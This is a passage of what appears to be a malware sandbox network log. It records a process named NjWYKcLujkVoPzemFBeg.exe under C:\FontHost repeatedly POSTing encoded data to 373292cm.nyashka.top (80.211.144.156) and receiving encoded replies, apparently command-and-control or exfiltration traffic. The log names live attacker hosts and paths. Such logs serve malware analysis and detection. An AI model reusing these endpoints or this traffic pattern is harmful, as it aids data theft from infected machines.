                              Aug 25, 2024 15:44:44.338846922 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:44.694585085 CEST2504OUTData Raw: 5a 51 5c 50 54 43 54 5a 5b 5f 5a 51 59 52 58 51 57 5a 5d 59 57 58 53 59 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZQ\PTCTZ[_ZQYRXQWZ]YWXSYYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.^;#$#=7 !=$Y+)_)- #Z#Q#R($"0,&F$.Y/1
                              Aug 25, 2024 15:44:45.002876043 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:45.202310085 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:44 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              89192.168.2.55994680.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:45.325170994 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2500
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:45.678941011 CEST2500OUTData Raw: 5a 56 5c 56 54 43 51 5b 5b 5f 5a 51 59 57 58 5f 57 50 5d 5d 57 5a 53 5a 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZV\VTCQ[[_ZQYWX_WP]]WZSZYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-;!$]401X)[ (!\<.4"/,71R*)#Y8&F$.Y/
                              Aug 25, 2024 15:44:45.993058920 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:46.122764111 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:45 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              90192.168.2.55994780.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:46.598778963 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:46.944597960 CEST2504OUTData Raw: 5f 57 5c 5f 54 41 51 5b 5b 5f 5a 51 59 56 58 57 57 51 5d 53 57 5c 53 5d 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _W\_TAQ[[_ZQYVXWWQ]SW\S]YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-.3?6-#7#:*=4Y(>6?+ +S7'+?#V5X,.&F$.Y/!


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              91192.168.2.55994880.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:47.185862064 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1828
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:47.538309097 CEST1828OUTData Raw: 5f 52 5c 52 51 47 54 59 5b 5f 5a 51 59 53 58 52 57 50 5d 58 57 5b 53 5c 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _R\RQGTY[_ZQYSXRWP]XW[S\YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-8;D6.' !)-(\?.>(>?X447V( 42,.&F$.Y/5
                              Aug 25, 2024 15:44:47.849723101 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:48.046835899 CEST308INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:47 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive
                              Data Raw: 09 1d 25 0c 2a 25 2e 10 26 28 3b 0b 30 0d 07 0c 2b 3d 27 1d 2a 5b 39 1a 24 06 04 00 27 3e 2c 55 27 15 3e 05 3c 2d 2a 57 31 2f 3b 5b 3a 0e 2b 5d 0c 13 21 06 37 3a 07 03 31 2c 20 58 3e 28 3f 5b 35 2c 03 00 2b 39 21 16 3e 2c 3b 02 3c 29 23 5d 2b 3a 2d 0c 2c 28 07 15 2d 20 25 0c 20 04 2b 52 0d 11 24 54 28 03 25 53 28 2e 33 17 23 28 23 13 26 3d 3d 08 31 21 32 1f 24 07 20 58 25 32 1c 0d 33 31 25 55 25 5d 3d 06 31 3f 0f 1f 21 22 23 54 2c 00 22 57 01 33 55 56
                              Data Ascii: %*%.&(;0+='*[9$'>,U'><-*W1/;[:+]!7:1, X>(?[5,+9!>,;<)#]+:-,(- % +R$T(%S(.3#(#&==1!2$ X%231%U%]=1?!"#T,"W3UV


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              92192.168.2.55994980.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:47.306085110 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:47.663379908 CEST2504OUTData Raw: 5f 51 59 53 54 40 51 5d 5b 5f 5a 51 59 50 58 57 57 5c 5d 5d 57 5c 53 5f 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _QYST@Q][_ZQYPXWW\]]W\S_YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-,##- 76)=7+.%]+7? !Q*) V),&F$.Y/
                              Aug 25, 2024 15:44:47.970736027 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:48.169765949 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:47 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              93192.168.2.55995080.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:48.292726994 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:48.712258101 CEST2504OUTData Raw: 5a 52 5c 52 54 45 54 5e 5b 5f 5a 51 59 56 58 50 57 5a 5d 5a 57 5a 53 5e 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZR\RTET^[_ZQYVXPWZ]ZWZS^YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_..#(5# &).(?X9\(-#+P#W8V*)8 9\..&F$.Y/!
                              Aug 25, 2024 15:44:49.202616930 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:49.203802109 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:48 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[
                              Aug 25, 2024 15:44:49.203888893 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:48 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              94192.168.2.55995180.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:49.338577032 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:49.694668055 CEST2504OUTData Raw: 5f 57 5c 5f 51 45 51 5a 5b 5f 5a 51 59 54 58 55 57 5b 5d 53 57 51 53 5a 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _W\_QEQZ[_ZQYTXUW[]SWQSZYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-,#<6=?7%Z)>/?._([?Z +Q4!(_ # 1;>&F$.Y/)
                              Aug 25, 2024 15:44:50.008923054 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:50.207356930 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:49 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              95192.168.2.55995280.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:50.338408947 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:50.703807116 CEST2504OUTData Raw: 5f 56 5c 54 54 45 54 58 5b 5f 5a 51 59 5f 58 53 57 59 5d 53 57 58 53 55 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _V\TTETX[_ZQY_XSWY]SWXSUYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.^.08!.;# )>=$<.%]+[;4?+Q78V+: "3";>&F$.Y/
                              Aug 25, 2024 15:44:51.023118973 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:51.157840014 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:50 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              96192.168.2.55995380.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:51.318837881 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:51.726092100 CEST2504OUTData Raw: 5f 5d 5c 53 54 49 54 5c 5b 5f 5a 51 59 50 58 5e 57 50 5d 53 57 5b 53 5a 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _]\STIT\[_ZQYPX^WP]SW[SZYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-. '!X4>?>.5<#Z+V <P<< 3=.>&F$.Y/
                              Aug 25, 2024 15:44:52.006839991 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:52.203919888 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:51 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              97192.168.2.55995480.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:52.344022989 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:52.694669962 CEST2504OUTData Raw: 5f 53 5c 53 54 48 51 59 5b 5f 5a 51 59 52 58 50 57 5a 5d 5e 57 5c 53 5c 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _S\STHQY[_ZQYRXPWZ]^W\S\YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.X.#/C">(\42+= +!_((#< *94 *8>&F$.Y/1
                              Aug 25, 2024 15:44:53.019326925 CEST25INHTTP/1.1 100 Continue


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              98192.168.2.55995580.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:53.060080051 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1796
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:53.413372993 CEST1796OUTData Raw: 5f 55 5c 5e 54 42 54 59 5b 5f 5a 51 59 57 58 56 57 5d 5d 52 57 50 53 55 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _U\^TBTY[_ZQYWXVW]]RWPSUYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-.3C5>(X"09>0<=)Z)-7 /(4" W?8 0=^;&F$.Y/!
                              Aug 25, 2024 15:44:53.746339083 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:53.875607967 CEST308INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:53 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive
                              Data Raw: 09 1d 25 0d 3d 35 2e 58 25 38 30 55 30 0d 00 52 2a 04 2b 5e 2a 2d 2e 00 27 28 0f 15 32 3d 3f 0d 26 3b 25 59 28 2e 25 08 25 2c 2c 02 2c 34 2b 5d 0c 13 22 5d 23 3a 32 1e 31 05 28 11 2a 38 01 5d 20 2c 39 05 28 3a 07 51 28 01 0d 02 3f 2a 27 11 28 2a 03 0c 2f 5e 25 5f 3a 0e 26 51 34 14 2b 52 0d 11 27 0e 3f 03 0f 56 3e 3e 15 14 35 38 23 5a 27 03 08 54 32 1c 32 53 26 2a 2f 04 27 31 2a 0c 33 08 29 1c 31 2b 36 11 31 11 25 1c 23 32 23 54 2c 00 22 57 01 33 55 56
                              Data Ascii: %=5.X%80U0R*+^*-.'(2=?&;%Y(.%%,,,4+]"]#:21(*8] ,9(:Q(?*'(*/^%_:&Q4+R'?V>>58#Z'T22S&*/'1*3)1+61%#2#T,"W3UV


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              99192.168.2.55995680.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:53.199465990 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:53.553872108 CEST2504OUTData Raw: 5f 53 59 50 54 49 51 5c 5b 5f 5a 51 59 54 58 50 57 51 5d 53 57 50 53 58 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _SYPTIQ\[_ZQYTXPWQ]SWPSXYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.X;#"-'"36> X+>+-/ ,4 <<+Y#V9..&F$.Y/)
                              Aug 25, 2024 15:44:53.868149996 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:54.000503063 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:53 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              100192.168.2.55995780.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:54.235459089 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:54.600898981 CEST2504OUTData Raw: 5a 57 5c 52 54 48 54 5d 5b 5f 5a 51 59 52 58 50 57 5e 5d 5a 57 58 53 5c 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZW\RTHT][_ZQYRXPW^]ZWXS\YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.\8+![( #=)[+(+>$"/74" S?*$4=..&F$.Y/1
                              Aug 25, 2024 15:44:54.935722113 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:55.071682930 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:54 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              101192.168.2.55995880.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:55.199062109 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:55.554023027 CEST2504OUTData Raw: 5f 55 5c 5f 51 43 51 5c 5b 5f 5a 51 59 51 58 51 57 5a 5d 5d 57 5a 53 55 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _U\_QCQ\[_ZQYQXQWZ]]WZSUYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.Y/#"4 9]=0]<=_)-?[##8S+#36/>&F$.Y/=
                              Aug 25, 2024 15:44:55.867396116 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:55.998883009 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:55 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              102192.168.2.55995980.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:56.125399113 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
